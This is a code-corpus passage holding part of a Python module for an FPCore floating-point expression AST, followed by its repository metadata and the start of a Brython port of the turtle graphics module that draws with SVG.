    alias one of the inputs); when both are non-empty a fresh merged
    dict is returned and neither input is mutated.
    """
    if not old_props:
        return new_props
    if not new_props:
        return old_props
    merged = {}
    merged.update(old_props)
    merged.update(new_props)
    return merged
# base ast class
class Expr(object):
    """Abstract base class for FPCore AST nodes.

    Subclasses implement subexprs() / replace_subexprs(); the generic
    tree-walking methods below use that pair to rebuild transformed
    copies of the tree without mutating the original.
    """
    name: str = 'Expr'
    def subexprs(self):
        # Returns the node's children as a list of groups (list of lists
        # of Expr), so nodes with heterogeneous child sets (e.g. bindings
        # vs. body) can keep them separate.
        raise NotImplementedError()
    def replace_subexprs(self, exprs):
        # Rebuilds a node of the same type from child groups shaped like
        # the output of subexprs().
        raise NotImplementedError()
    def copy(self):
        """Return a deep copy of this subtree."""
        exprs = [[e.copy() for e in es] for es in self.subexprs()]
        return self.replace_subexprs(exprs)
    def depth_limit(self, n):
        """Return a copy truncated at depth n; pruned subtrees become EmptyExpr."""
        if n > 0:
            exprs = [[e.depth_limit(n-1) for e in es] for es in self.subexprs()]
            return self.replace_subexprs(exprs)
        else:
            return EmptyExpr()
    def remove_annotations(self):
        """Return a copy with all Ctx (!) annotations stripped (see Ctx's override)."""
        exprs = [[e.remove_annotations() for e in es] for es in self.subexprs()]
        return self.replace_subexprs(exprs)
    def condense_annotations(self, global_props=None, local_props=None):
        """Return a copy where each Ctx only carries properties that differ
        from its inherited context (computed via diff_props)."""
        all_props, new_props = diff_props(global_props, local_props)
        exprs = [[e.condense_annotations(all_props, None) for e in es] for es in self.subexprs()]
        if new_props:
            return Ctx(new_props, self.replace_subexprs(exprs))
        else:
            return self.replace_subexprs(exprs)
    def canonicalize_annotations(self, global_props=None):
        """Return a copy where the full effective property set is pushed down
        the tree (Val and NaryExpr wrap themselves in explicit Ctx nodes)."""
        exprs = [[e.canonicalize_annotations(global_props) for e in es] for es in self.subexprs()]
        return self.replace_subexprs(exprs)
    def merge_annotations(self, annotations, local_props=None):
        """Return a copy with extra properties merged in as Ctx wrappers.

        annotations maps id(node) -> property dict, so it must be built
        against this exact tree (object identity, not equality).
        """
        new_props = update_props(local_props, annotations.get(id(self)))
        exprs = [[e.merge_annotations(annotations, None) for e in es] for es in self.subexprs()]
        if new_props:
            return Ctx(new_props, self.replace_subexprs(exprs))
        else:
            return self.replace_subexprs(exprs)
    def expand_tensor(self, ctx):
        """Return a copy with tensor constructs unrolled; ctx maps index
        variable names to concrete integer values."""
        exprs = [[e.expand_tensor(ctx) for e in es] for es in self.subexprs()]
        return self.replace_subexprs(exprs)
class EmptyExpr(Expr):
    """Placeholder standing in for a subtree pruned by Expr.depth_limit."""
    name: str = 'EmptyExpr'
    def subexprs(self):
        # Leaf node: no children.
        return []
    def replace_subexprs(self, exprs):
        # Stateless, so "replacement" is simply a fresh instance.
        return EmptyExpr()
    def __str__(self):
        return '...'
    def __repr__(self):
        return '{}()'.format(type(self).__name__)
# arbitrary s-expression data (usually from properties)
class Data(Expr):
    """Wraps an arbitrary s-expression (scalar node or tuple of nodes).

    Used mainly for property values. The as_* accessors interpret the
    wrapped value as a particular sort of datum, returning None (or
    raising TypeError when strict=True) on a mismatch.
    """
    name: str = 'Data'
    def __init__(self, value) -> None:
        # value: a Val/Var/Constant/String node, a tuple of nodes, or
        # other raw s-expression content.
        self.value = value
    def __str__(self):
        return sexp_to_string(self.value)
    def __repr__(self):
        return type(self).__name__ + '(' + repr(self.value) + ')'
    def __eq__(self, other):
        # Compare against other Data-like wrappers, or raw values directly.
        try:
            return self.value == other.value
        except AttributeError:
            return self.value == other
    def __hash__(self):
        return hash(self.value)
    def subexprs(self):
        # Treated as a leaf by the generic tree walkers.
        return []
    def replace_subexprs(self, exprs):
        return type(self)(self.value)
    def is_number(self):
        # Numbers are Vals that are not named Constants.
        return isinstance(self.value, Val) and not isinstance(self.value, Constant)
    def as_number(self, strict=False):
        if isinstance(self.value, Val) and not isinstance(self.value, Constant):
            return self.value
        elif strict:
            raise TypeError('data is not a number')
        else:
            return None
    def is_symbol(self):
        # Symbols are variable references or named constants.
        return isinstance(self.value, Var) or isinstance(self.value, Constant)
    def as_symbol(self, strict=False):
        if isinstance(self.value, Var) or isinstance(self.value, Constant):
            return self.value.value
        elif strict:
            raise TypeError('data is not a symbol')
        else:
            return None
    def is_string(self):
        return isinstance(self.value, String)
    def as_string(self, strict=False):
        if isinstance(self.value, String):
            return self.value.value
        elif strict:
            raise TypeError('data is not a string')
        else:
            return None
    def is_list(self):
        # Lists are stored as tuples.
        return isinstance(self.value, tuple)
    def as_list(self, strict=False):
        if isinstance(self.value, tuple):
            return self.value
        elif strict:
            raise TypeError('data is not a list')
        else:
            return None
# values
class ValueExpr(Expr):
    """Base class for leaf values: variables, constants, and numbers."""
    name: str = 'ValueExpr'
    # Except for integers, all values (variables, constants, or numbers)
    # are represented as strings in the AST.
    def __init__(self, value: str) -> None:
        self.value: str = value
    def __str__(self):
        return str(self.value)
    def __repr__(self):
        return type(self).__name__ + '(' + repr(self.value) + ')'
    def subexprs(self):
        # Leaf node: no children.
        return []
    def replace_subexprs(self, exprs):
        return type(self)(self.value)
    def depth_limit(self, n):
        # always return the whole value (never truncate a leaf to EmptyExpr)
        exprs = [[e.depth_limit(n-1) for e in es] for es in self.subexprs()]
        return self.replace_subexprs(exprs)
class Var(ValueExpr):
    """A variable reference; equal to other Vars (or raw values) with the same name."""
    name: str = 'Var'
    def __eq__(self, other):
        try:
            return self.value == other.value
        except AttributeError:
            return self.value == other
    def __hash__(self):
        return hash(self.value)
class Val(ValueExpr):
    """Base class for literal values and named constants."""
    name: str = 'Val'
    def __eq__(self, other):
        try:
            return self.value == other.value
        except AttributeError:
            return self.value == other
    def __hash__(self):
        return hash(self.value)
    def canonicalize_annotations(self, global_props=None):
        # Values are annotation sites: wrap the result in an explicit
        # Ctx carrying the full effective property set.
        result = super().canonicalize_annotations(global_props)
        if global_props:
            return Ctx(global_props, result)
        else:
            return result
class Constant(Val):
    # A named constant; value holds the constant's symbol.
    name: str = 'Constant'
class Decnum(Val):
    # A decimal numeral, kept as its source string.
    name: str = 'Decnum'
class Hexnum(Val):
    # A hexadecimal numeral, kept as its source string.
    name: str = 'Hexnum'
class Integer(Val):
    """An integer literal; keeps both the int (self.i) and its string form."""
    name: str = 'Integer'
    def __init__(self, i: int) -> None:
        super().__init__(str(i))
        self.i = i
    def __repr__(self):
        return type(self).__name__ + '(' + repr(self.i) + ')'
    def replace_subexprs(self, exprs):
        # Rebuild from the int, not the string form.
        return type(self)(self.i)
class Rational(Val):
    """An exact rational literal p/q."""
    name: str = 'Rational'
    def __init__(self, p: int, q: int) -> None:
        super().__init__(str(p) + '/' + str(q))
        self.p : int = p
        self.q : int = q
    def __repr__(self):
        return type(self).__name__ + '(' + repr(self.p) + ', ' + repr(self.q) + ')'
    def replace_subexprs(self, exprs):
        return type(self)(self.p, self.q)
class Digits(Val):
    """A (digits m e b) literal; value holds the rendered s-expression string."""
    name: str = 'digits'
    def __init__(self, m: int, e: int, b: int) -> None:
        super().__init__('(' + self.name + ' ' + str(m) + ' ' + str(e) + ' ' + str(b) + ')')
        self.m: int = m  # mantissa
        self.e: int = e  # exponent
        self.b: int = b  # base
    def __repr__(self):
        return type(self).__name__ + '(' + repr(self.m) + ', ' + repr(self.e) + ', ' + repr(self.b) + ')'
    def replace_subexprs(self, exprs):
        return type(self)(self.m, self.e, self.b)
class String(ValueExpr):
    """A string literal (not a Val: strings are data, not numbers)."""
    name: str = 'String'
    def __eq__(self, other):
        try:
            return self.value == other.value
        except AttributeError:
            return self.value == other
    def __hash__(self):
        return hash(self.value)
# rounding contexts
class Ctx(Expr):
    """A (! :prop value ... body) annotation wrapping a single body expression.

    The annotation-rewriting methods below unwrap the Ctx node itself
    and fold its properties into the recursion over the body.
    """
    name: str = '!'
    def __init__(self, props: dict, body: Expr) -> None:
        self.props = props  # property name -> s-expression value
        self.body = body
    def __str__(self):
        return ('(' + self.name + ' '
                + ''.join((':' + k + ' ' + sexp_to_string(v) + ' ' for k, v in self.props.items()))
                + str(self.body) + ')')
    def __repr__(self):
        return type(self).__name__ + '(' + repr(self.props) + ', ' + repr(self.body) + ')'
    def subexprs(self):
        return [[self.body]]
    def replace_subexprs(self, exprs):
        ((body,),) = exprs
        return type(self)(self.props, body)
    def remove_annotations(self):
        # Drop this annotation entirely.
        return self.body.remove_annotations()
    def condense_annotations(self, global_props=None, local_props=None):
        # Accumulate our props into the pending local set and recurse;
        # the base Expr method decides whether a new Ctx is re-emitted.
        new_props = update_props(local_props, self.props)
        return self.body.condense_annotations(global_props, new_props)
    def canonicalize_annotations(self, global_props=None):
        # Fold our props into the inherited set and push down; leaves
        # re-wrap themselves, so this Ctx node disappears.
        all_props = update_props(global_props, self.props)
        return self.body.canonicalize_annotations(all_props)
    def merge_annotations(self, annotations, local_props=None):
        new_props = update_props(local_props, self.props)
        return self.body.merge_annotations(annotations, new_props)
# control flow and tensors
class ControlExpr(Expr):
    """Base class for control-flow and tensor constructs."""
    name: str = 'ControlExpr'
class If(ControlExpr):
    """(if cond then_body else_body)"""
    name: str = 'if'
    def __init__(self, cond: Expr, then_body: Expr, else_body: Expr) -> None:
        self.cond: Expr = cond
        self.then_body: Expr = then_body
        self.else_body: Expr = else_body
    def __str__(self):
        return '(' + self.name + ' ' + str(self.cond) + ' ' + str(self.then_body) + ' ' + str(self.else_body) + ')'
    def __repr__(self):
        return type(self).__name__ + '(' + repr(self.cond) + ', ' + repr(self.then_body) + ', ' + repr(self.else_body) + ')'
    def subexprs(self):
        # All three children in a single group.
        return [[self.cond, self.then_body, self.else_body]]
    def replace_subexprs(self, exprs):
        ((cond, then_body, else_body,),) = exprs
        return type(self)(cond, then_body, else_body)
class Let(ControlExpr):
    """(let ([x e] ...) body) — parallel local bindings.

    NOTE(review): subexprs() unpacks zip(*let_bindings), which raises
    ValueError on an empty binding list — presumably bindings are always
    non-empty; confirm against the parser.
    """
    name: str = 'let'
    def __init__(self, let_bindings: typing.List[typing.Tuple[str, Expr]], body: Expr) -> None:
        self.let_bindings: typing.List[typing.Tuple[str, Expr]] = let_bindings
        self.body: Expr = body
    def __str__(self):
        return ('(' + self.name
                + ' (' + ' '.join(('[' + x + ' ' + str(e) + ']' for x, e in self.let_bindings)) + ') '
                + str(self.body) + ')')
    def __repr__(self):
        return type(self).__name__ + '(' + repr(self.let_bindings) + ', ' + repr(self.body) + ')'
    def subexprs(self):
        # Bound expressions and the body are separate child groups.
        let_vars, let_exprs = zip(*self.let_bindings)
        return [let_exprs, [self.body]]
    def replace_subexprs(self, exprs):
        (let_exprs, (body,),) = exprs
        # Re-pair the original variable names with the new expressions.
        let_bindings = [(x, e,) for ((x, _,), e,) in zip(self.let_bindings, let_exprs)]
        return type(self)(let_bindings, body)
class LetStar(Let):
    # Sequential bindings; structure is identical to Let.
    name: str = 'let*'
class While(ControlExpr):
    """(while cond ([x init update] ...) body) — loop with accumulator bindings."""
    name: str = 'while'
    def __init__(self, cond: Expr, while_bindings: typing.List[typing.Tuple[str, Expr, Expr]], body: Expr) -> None:
        self.cond: Expr = cond
        # Each binding is (name, init expression, update expression).
        self.while_bindings: typing.List[typing.Tuple[str, Expr, Expr]] = while_bindings
        self.body: Expr = body
    def __str__(self):
        return ('(' + self.name + ' ' + str(self.cond)
                + ' (' + ' '.join(('[' + x + ' ' + str(e0) + ' ' + str(e) + ']' for x, e0, e in self.while_bindings)) + ') '
                + str(self.body) + ')')
    def __repr__(self):
        return type(self).__name__ + '(' + repr(self.cond) + ', ' + repr(self.while_bindings) + ', ' + repr(self.body) + ')'
    def subexprs(self):
        # Groups: condition, init expressions, update expressions, body.
        while_vars, while_inits, while_updates = zip(*self.while_bindings)
        return [[self.cond], while_inits, while_updates, [self.body]]
    def replace_subexprs(self, exprs):
        ((cond,), while_inits, while_updates, (body,),) = exprs
        while_bindings = [(x, e0, e,) for ((x, _, _,), e0, e,) in zip(self.while_bindings, while_inits, while_updates)]
        return type(self)(cond, while_bindings, body)
class WhileStar(While):
    # Sequential-update variant; structure is identical to While.
    name: str = 'while*'
class For(ControlExpr):
    """(for ([i n] ...) ([x init update] ...) body) — indexed loop."""
    name: str = 'for'
    def __init__(self,
                 dim_bindings: typing.List[typing.Tuple[str, Expr]],
                 while_bindings: typing.List[typing.Tuple[str, Expr, Expr]],
                 body: Expr) -> None:
        # dim_bindings: (index name, extent expression) pairs.
        self.dim_bindings: typing.List[typing.Tuple[str, Expr]] = dim_bindings
        self.while_bindings: typing.List[typing.Tuple[str, Expr, Expr]] = while_bindings
        self.body: Expr = body
    def __str__(self):
        return ('(' + self.name
                + ' (' + ' '.join(('[' + x + ' ' + str(e) + ']' for x, e in self.dim_bindings)) + ')'
                + ' (' + ' '.join(('[' + x + ' ' + str(e0) + ' ' + str(e) + ']' for x, e0, e in self.while_bindings)) + ') '
                + str(self.body) + ')')
    def __repr__(self):
        return type(self).__name__ + '(' + repr(self.dim_bindings) + ', ' + repr(self.while_bindings) + ', ' + repr(self.body) + ')'
    def subexprs(self):
        dim_vars, dim_exprs = zip(*self.dim_bindings)
        while_vars, while_inits, while_updates = zip(*self.while_bindings)
        return [dim_exprs, while_inits, while_updates, [self.body]]
    def replace_subexprs(self, exprs):
        (dim_exprs, while_inits, while_updates, (body,),) = exprs
        dim_bindings = [(x, e,) for ((x, _,), e,) in zip(self.dim_bindings, dim_exprs)]
        while_bindings = [(x, e0, e,) for ((x, _, _,), e0, e,) in zip(self.while_bindings, while_inits, while_updates)]
        return type(self)(dim_bindings, while_bindings, body)
    def expand_tensor(self, ctx):
        """Unroll the loop into a let* chain of accumulator updates.

        NOTE(review): only the FIRST dim binding and FIRST while binding
        are unrolled ([0] below); any additional bindings are dropped.
        Also requires the extent to be an Integer node (uses .i).
        Confirm callers only pass single-binding loops.
        """
        idx_var, idx_max = self.dim_bindings[0]
        let_var, let_init, let_update = self.while_bindings[0]
        star_bindings = [(let_var, let_init.expand_tensor(ctx))]
        for i in range(idx_max.i):
            # Rebind the index variable to the concrete value i for this step.
            new_ctx = {}
            new_ctx.update(ctx)
            new_ctx.update({idx_var : i})
            star_bindings.append((let_var, let_update.expand_tensor(new_ctx)))
        return LetStar(star_bindings, self.body.expand_tensor(ctx))
class ForStar(For):
    # Sequential-update variant; structure is identical to For.
    name: str = 'for*'
class Tensor(ControlExpr):
    """(tensor ([i n] ...) body) — tensor comprehension over index ranges."""
    name: str = 'tensor'
    def __init__(self, dim_bindings: typing.List[typing.Tuple[str, Expr]], body: Expr) -> None:
        self.dim_bindings: typing.List[typing.Tuple[str, Expr]] = dim_bindings
        self.body: Expr = body
    def __str__(self):
        return ('(' + self.name
                + ' (' + ' '.join(('[' + x + ' ' + str(e) + ']' for x, e in self.dim_bindings)) + ') '
                + str(self.body) + ')')
    def __repr__(self):
        return type(self).__name__ + '(' + repr(self.dim_bindings) + ', ' + repr(self.body) + ')'
    def subexprs(self):
        dim_vars, dim_exprs = zip(*self.dim_bindings)
        return [dim_exprs, [self.body]]
    def replace_subexprs(self, exprs):
        (dim_exprs, (body,),) = exprs
        dim_bindings = [(x, e,) for ((x, _,), e,) in zip(self.dim_bindings, dim_exprs)]
        return type(self)(dim_bindings, body)
class TensorStar(Tensor):
    """(tensor* [ident] ([i n] ...) [([x init update] ...)] body).

    Extends Tensor with an optional identifier and optional accumulator
    bindings; both render as empty strings when absent.
    """
    name: str = 'tensor*'
    def __init__(self,
                 ident: str,
                 dim_bindings: typing.List[typing.Tuple[str, Expr]],
                 while_bindings: typing.List[typing.Tuple[str, Expr, Expr]],
                 body: Expr) -> None:
        self.ident: str = ident
        self.dim_bindings: typing.List[typing.Tuple[str, Expr]] = dim_bindings
        self.while_bindings: typing.List[typing.Tuple[str, Expr, Expr]] = while_bindings
        self.body: Expr = body
    def __str__(self):
        if self.ident:
            ident_str = ' ' + self.ident
        else:
            ident_str = ''
        if self.while_bindings:
            while_str = ' (' + ' '.join(('[' + x + ' ' + str(e0) + ' ' + str(e) + ']' for x, e0, e in self.while_bindings)) + ')'
        else:
            while_str = ''
        return ('(' + self.name
                + ident_str
                + ' (' + ' '.join(('[' + x + ' ' + str(e) + ']' for x, e in self.dim_bindings)) + ')'
                + while_str
                + ' ' + str(self.body) + ')')
    def __repr__(self):
        return (type(self).__name__ + '('
                + repr(self.ident) + ', '
                + repr(self.dim_bindings) + ', '
                + repr(self.while_bindings) + ', '
                + repr(self.body) + ')')
    def subexprs(self):
        dim_vars, dim_exprs = zip(*self.dim_bindings)
        # Unlike While/For, an empty while-binding list is tolerated here.
        if self.while_bindings:
            while_vars, while_inits, while_updates = zip(*self.while_bindings)
        else:
            while_vars, while_inits, while_updates = [], [], []
        return [dim_exprs, while_inits, while_updates, [self.body]]
    def replace_subexprs(self, exprs):
        (dim_exprs, while_inits, while_updates, (body,),) = exprs
        dim_bindings = [(x, e,) for ((x, _,), e,) in zip(self.dim_bindings, dim_exprs)]
        while_bindings = [(x, e0, e,) for ((x, _, _,), e0, e,) in zip(self.while_bindings, while_inits, while_updates)]
        return type(self)(self.ident, dim_bindings, while_bindings, body)
# operations
class NaryExpr(Expr):
    """Base class for operator applications with any number of children."""
    name: str = 'NaryExpr'
    def __init__(self, *children: Expr) -> None:
        # NOTE: despite the List annotation this stores the *args tuple.
        self.children: typing.List[Expr] = children
    def __str__(self):
        return '(' + self.name + ''.join((' ' + str(child) for child in self.children)) + ')'
    def __repr__(self):
        return type(self).__name__ + '(' + ', '.join((repr(child) for child in self.children)) + ')'
    def subexprs(self):
        return [self.children]
    def replace_subexprs(self, exprs):
        (children,) = exprs
        return type(self)(*children)
    def canonicalize_annotations(self, global_props=None):
        # Operations are annotation sites: wrap the result in an explicit
        # Ctx carrying the full effective property set.
        result = super().canonicalize_annotations(global_props)
        if global_props:
            return Ctx(global_props, result)
        else:
            return result
class Array(NaryExpr):
    """(array e ...) — a literal array of expressions."""
    name: str = 'array'
    # this is a dumb copy-pasta to avoid inheriting the behavior of other NaryExprs
    # (arrays are not math operations, so they must not wrap themselves in Ctx);
    # really there should be a MathOp mixin or something
    def canonicalize_annotations(self, global_props=None):
        exprs = [[e.canonicalize_annotations(global_props) for e in es] for es in self.subexprs()]
        return self.replace_subexprs(exprs)
class UnknownOperator(NaryExpr):
    """An operator application whose name is not in the known taxonomy.

    The operator spelling is kept per-instance in self.name (shadowing
    the class attribute), so str() still renders it correctly.
    """
    name: str = 'UnknownOperator'
    def __init__(self, *children: Expr, name='UnknownOperator') -> None:
        super().__init__(*children)
        self.name = name
    def __repr__(self):
        return type(self).__name__ + '(' + ''.join((repr(child) + ', ' for child in self.children)) + 'name=' + repr(self.name) + ')'
    def replace_subexprs(self, exprs):
        (children,) = exprs
        # Preserve the instance-level operator name on rebuild.
        return type(self)(*children, name=self.name)
class UnaryExpr(NaryExpr):
    """NaryExpr restricted to exactly one child."""
    name: str = 'UnaryExpr'
    def __init__(self, child0: Expr) -> None:
        super().__init__(child0)
class BinaryExpr(NaryExpr):
    """NaryExpr restricted to exactly two children."""
    name: str = 'BinaryExpr'
    def __init__(self, child0: Expr, child1: Expr) -> None:
        super().__init__(child0, child1)
class TernaryExpr(NaryExpr):
    """NaryExpr restricted to exactly three children."""
    name: str = 'TernaryExpr'
    def __init__(self, child0: Expr, child1: Expr, child2: Expr) -> None:
        super().__init__(child0, child1, child2)
# cast is the identity function, used for repeated rounding
class Cast(UnaryExpr):
    name: str = 'cast'
# tensor operations
class Dim(UnaryExpr):
    name: str = 'dim'
class Size(NaryExpr):
    name: str = 'size'
class Ref(NaryExpr):
    """(ref tensor idx ...) — element access into a tensor."""
    name: str = 'ref'
    def expand_tensor(self, ctx):
        """Resolve the reference to a flattened scalar name.

        Indices must be either index variables (looked up in ctx) or
        Integer literals; (ref A i j) with i=1, j=2 becomes "A_1_2".
        NOTE(review): this returns a plain str rather than a Var node,
        unlike the other expand_tensor implementations — confirm the
        result is only ever stringified afterwards.
        """
        tensor_expr = self.children[0]
        index_exprs = self.children[1:]
        if isinstance(tensor_expr, Var):
            index_values = []
            for e in index_exprs:
                if isinstance(e, Var):
                    index_values.append(ctx[e.value])
                elif isinstance(e, Integer):
                    index_values.append(e.i)
                else:
                    raise NotImplementedError()
            return tensor_expr.value + '_' + '_'.join(map(str, index_values))
        else:
            raise NotImplementedError()
# Concrete operator taxonomy. Each class's `name` is the FPCore spelling
# of the operator; arity is fixed by the base class (Unary/Binary/Ternary),
# while comparison and logic operators accept any number of arguments.
# IEEE 754 required arithmetic
class Add(BinaryExpr):
    name: str = '+'
class Sub(BinaryExpr):
    name: str = '-'
class Mul(BinaryExpr):
    name: str = '*'
class Div(BinaryExpr):
    name: str = '/'
class Sqrt(UnaryExpr):
    name: str = 'sqrt'
class Fma(TernaryExpr):
    name: str = 'fma'
# discrete operations
class Neg(UnaryExpr):
    # note that unary negation has the same "name" as subtraction
    name: str = '-'
class Copysign(BinaryExpr):
    name: str = 'copysign'
class Fabs(UnaryExpr):
    name: str = 'fabs'
# composite arithmetic
class Fdim(BinaryExpr):
    name: str = 'fdim'
class Fmax(BinaryExpr):
    name: str = 'fmax'
class Fmin(BinaryExpr):
    name: str = 'fmin'
class Fmod(BinaryExpr):
    name: str = 'fmod'
class Remainder(BinaryExpr):
    name: str = 'remainder'
# rounding and truncation
class Ceil(UnaryExpr):
    name: str = 'ceil'
class Floor(UnaryExpr):
    name: str = 'floor'
class Nearbyint(UnaryExpr):
    name: str = 'nearbyint'
class Round(UnaryExpr):
    name: str = 'round'
class Trunc(UnaryExpr):
    name: str = 'trunc'
# trig
class Acos(UnaryExpr):
    name: str = 'acos'
class Acosh(UnaryExpr):
    name: str = 'acosh'
class Asin(UnaryExpr):
    name: str = 'asin'
class Asinh(UnaryExpr):
    name: str = 'asinh'
class Atan(UnaryExpr):
    name: str = 'atan'
class Atan2(BinaryExpr):
    name: str = 'atan2'
class Atanh(UnaryExpr):
    name: str = 'atanh'
class Cos(UnaryExpr):
    name: str = 'cos'
class Cosh(UnaryExpr):
    name: str = 'cosh'
class Sin(UnaryExpr):
    name: str = 'sin'
class Sinh(UnaryExpr):
    name: str = 'sinh'
class Tan(UnaryExpr):
    name: str = 'tan'
class Tanh(UnaryExpr):
    name: str = 'tanh'
# exponentials
class Exp(UnaryExpr):
    name: str = 'exp'
class Exp2(UnaryExpr):
    name: str = 'exp2'
class Expm1(UnaryExpr):
    name: str = 'expm1'
class Log(UnaryExpr):
    name: str = 'log'
class Log10(UnaryExpr):
    name: str = 'log10'
class Log1p(UnaryExpr):
    name: str = 'log1p'
class Log2(UnaryExpr):
    name: str = 'log2'
# powers
class Cbrt(UnaryExpr):
    name: str = 'cbrt'
class Hypot(BinaryExpr):
    name: str = 'hypot'
class Pow(BinaryExpr):
    name: str = 'pow'
# other
class Erf(UnaryExpr):
    name: str = 'erf'
class Erfc(UnaryExpr):
    name: str = 'erfc'
class Lgamma(UnaryExpr):
    name: str = 'lgamma'
class Tgamma(UnaryExpr):
    name: str = 'tgamma'
# comparison (n-ary: these accept any number of arguments)
class LT(NaryExpr):
    name: str = '<'
class GT(NaryExpr):
    name: str = '>'
class LEQ(NaryExpr):
    name: str = '<='
class GEQ(NaryExpr):
    name: str = '>='
class EQ(NaryExpr):
    name: str = '=='
class NEQ(NaryExpr):
    name: str = '!='
# classification
class Isfinite(UnaryExpr):
    name: str = 'isfinite'
class Isinf(UnaryExpr):
    name: str = 'isinf'
class Isnan(UnaryExpr):
    name: str = 'isnan'
class Isnormal(UnaryExpr):
    name: str = 'isnormal'
class Signbit(UnaryExpr):
    name: str = 'signbit'
# logic
class And(NaryExpr):
    name: str = 'and'
class Or(NaryExpr):
    name: str = 'or'
class Not(UnaryExpr):
    name: str = 'not'
# fpcore objects and helpers
class FPCore(object):
    """A parsed FPCore: argument list, body expression, and metadata."""
    def __init__(self, inputs, e, props=None, ident=None, name=None, pre=None, spec=None):
        # inputs: list of (name, props, shape) argument descriptors
        # (consumed as annotation_to_string(*arg) below).
        self.inputs = inputs
        # e: the body expression tree.
        self.e = e
        if props is None:
            self.props = {}
        else:
            self.props = props
        self.ident = ident
        self.name = name
        self.pre = pre    # precondition expression, if any
        self.spec = spec  # specification expression, if any
    def __str__(self):
        return 'FPCore ({})\n ident: {}\n name: {}\n pre: {}\n spec: {}\n {}'.format(
            ' '.join((annotation_to_string(*arg) for arg in self.inputs)),
            str(self.ident), str(self.name), str(self.pre), str(self.spec), str(self.e))
    def __repr__(self):
        return 'FPCore(\n {},\n {},\n ident={}\n props={}\n)'.format(
            repr(self.inputs), repr(self.e), repr(self.ident), repr(self.props))
    def __eq__(self, other):
        # Equality ignores ident/name/pre/spec; only inputs, body, and
        # props are compared.
        if not isinstance(other, FPCore):
            return False
        return self.inputs == other.inputs and self.e == other.e and self.props == other.props
    @property
    def sexp(self):
        """The core rendered back into FPCore s-expression syntax."""
        return '(FPCore ({}) {}{})'.format(
            ' '.join((annotation_to_string(*arg) for arg in self.inputs)),
            ''.join(':' + name + ' ' + sexp_to_string(prop) + ' ' for name, prop in self.props.items()),
            str(self.e))
    def expand_tensor(self):
        """Return a copy with tensor arguments flattened into scalars.

        A shaped argument x of size n becomes scalar arguments x_0..x_{n-1}.
        NOTE(review): only the first dimension is used (shape[0]), and
        range(size) requires the size to be a plain int — confirm how
        shapes are represented by the caller.
        """
        new_args = []
        for arg in self.inputs:
            name, props, shape = arg
            if shape:
                size = shape[0]
                new_names = [name + '_' + str(i) for i in range(size)]
                for new_name in new_names:
                    new_args.append((new_name, props, []))
            else:
                new_args.append(arg)
        return FPCore(new_args, self.e.expand_tensor({}),
                      props=self.props,
                      ident=self.ident,
                      name=self.name,
                      pre=self.pre.expand_tensor({}) if self.pre else None,
                      spec=self.spec.expand_tensor({}) if self.spec else None)
| {
"repo_name": "billzorn/fpunreal",
"path": "titanfp/fpbench/fpcast.py",
"copies": "1",
"size": "26421",
"license": "mit",
"hash": -5900697640643337000,
"line_mean": 27.6561822126,
"line_max": 133,
"alpha_frac": 0.5588357746,
"autogenerated": false,
"ratio": 3.4272927746789468,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.44861285492789466,
"avg_score": null,
"num_lines": null
} |
# A revised version of CPython's turtle module written for Brython
#
# Note: This version is not intended to be used in interactive mode,
# nor use help() to look up methods/functions definitions. The docstrings
# have thus been shortened considerably as compared with the CPython's version.
#
# All public methods/functions of the CPython version should exist, if only
# to print out a warning that they are not implemented. The intent is to make
# it easier to "port" any existing turtle program from CPython to the browser.
#
# IMPORTANT: We use SVG for drawing turtles. If we have a turtle at an angle
# of 350 degrees and we rotate it by an additional 20 degrees, we will have
# a turtle at an angle of 370 degrees. For turtles drawn periodically on
# a screen (like typical animations, including the CPython turtle module),
# drawing a turtle with a rotation of 370 degrees is the same as a rotation of
# 10 degrees. However, using SVG, if we "slowly" animate an object,
# rotating it from 350 to 370 degrees, the result will not be the same
# as rotating it from 350 to 10 degrees. For this reason, we did not use the
# Vec2D class from the CPython module and handle the rotations quite differently.
import math
import sys
from math import cos, sin
from browser import console, document, html, timer
import _svg as svg
import copy
# Even though it is a private object, use the same name for the configuration
# dict as the CPython's module.
# Commented out configuration items are those found on the CPython version
_CFG = {
    # "width" : 0.5, # Screen
    # "height" : 0.75,
    "canvwidth" : 500,
    "canvheight": 500,
    # "leftright": None,
    # "topbottom": None,
    "mode": "standard",
    # "colormode": 1.0,
    # "delay": 10,
    # "undobuffersize": 1000,
    "shape": "classic",
    "pencolor" : "black",
    "fillcolor" : "black",
    # "resizemode" : "noresize",
    "visible" : True,
    # "language": "english", # docstrings
    # "exampleturtle": "turtle",
    # "examplescreen": "screen",
    # "title": "Python Turtle Graphics",
    # "using_IDLE": False
    # Below are configuration items specific to this version
    "turtle_canvas_wrapper": None,
    "turtle_canvas_id": "turtle-canvas",
    "min_duration": "1ms"  # minimum length of one SVG animation frame
}
# Pristine copy of the defaults — presumably used to restore _CFG to its
# original state; usage is outside this chunk, TODO confirm.
_cfg_copy = copy.copy(_CFG)
def set_defaults(**params):
    """Allows to override defaults.

    Merges *params* into the module configuration dict, then resets the
    (singleton) Screen so the new settings take effect.
    """
    _CFG.update(**params)
    Screen().reset()
class FormattedTuple(tuple):
    '''A coordinate pair whose repr shows two decimal places.'''
    def __new__(cls, x, y):
        pair = (x, y)
        return super().__new__(cls, pair)
    def __repr__(self):
        return "(%.2f, %.2f)" % self
def create_circle(r):
    '''Creates a circle of radius r centered at the origin'''
    # Returns an SVG <circle> element (via the Brython _svg module).
    circle = svg.circle(x=0, y=0, r=r, stroke="black", fill="black")
    circle.setAttribute("stroke-width", 1)
    return circle
def create_polygon(points):
    '''Creates a polygon using the points provided'''
    # Each (x, y) pair is rendered as "x,y " for the SVG points attribute;
    # returns an SVG <polygon> element.
    points = ["%s,%s " % (x, y) for x, y in points]
    polygon = svg.polygon(points=points, stroke="black", fill="black")
    polygon.setAttribute("stroke-width", 1)
    return polygon
def create_rectangle(width=2, height=2, rx=None, ry=None):
    '''Creates a rectangle centered at the origin. rx and ry can be
       used to have rounded corners'''
    # Returns an SVG <rect> element; x/y offsets center it on (0, 0).
    rectangle = svg.rect(x=-width/2, y=-height/2, width=width,
                         height=height, stroke="black", fill="black")
    rectangle.setAttribute("stroke-width", 1)
    if rx is not None:
        rectangle.setAttribute("rx", rx)
    if ry is not None:
        rectangle.setAttribute("ry", ry)
    return rectangle
def create_square(size=2, r=None):
    '''Creates a square centered at the origin. r can be used
       to have rounded corners'''
    return create_rectangle(width=size, height=size, rx=r, ry=r)
class TurtleGraphicsError(Exception):
    """Some TurtleGraphics Error

    Raised for turtle-module-specific failures (mirrors the exception of
    the same name in CPython's turtle module).
    """
    pass
